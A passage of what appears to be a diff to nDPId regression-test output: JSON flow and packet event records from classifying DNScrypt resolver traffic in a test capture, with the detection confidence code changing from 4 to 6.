AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAXcylYgAL0RKU8KAAABaO66wOj5AbsGBMBOZFcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAXcylQgAL0RKVEKAAABaO66wK3LAbsGBPuAZFMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":47,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304363} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":47,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAABQylQAub0RTiQKAAABaO66wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":48,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304363} @@ -119,26 +119,26 @@ 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946739304399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739304399,"pkt":"ZmZmZmZmRERERERECABFAADUET5AADQRUHBo7rrACgAAAQG76PkAwCm6ZFeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAhKdWfhZK3D+gyCT1iixW\/FSRGoXDftkwga2BkZlttUlKSV94EyK2+BzaupeI4vEl+rXXsyVAmoCDcu2+5DAsD7Asxq95SKQwdQwh70VVdkKEIfYOFTawzG9XuIku9iynsCzGr3lIpDAAAAAFfU3cYX1TImA=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAIcZhNAAL0R0ewKAAAB0frxGYAZAbsCCIXq8VkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAXcZhQgAL0R7isKAAAB0frxGdrjAbsGBM5Z8VQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":59,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304599} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":59,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAABQZhQAub0REv8KAAAB0frxGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAXcZhUgAL0R7ioKAAAB0frxGZEDAbsGBBg48VYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA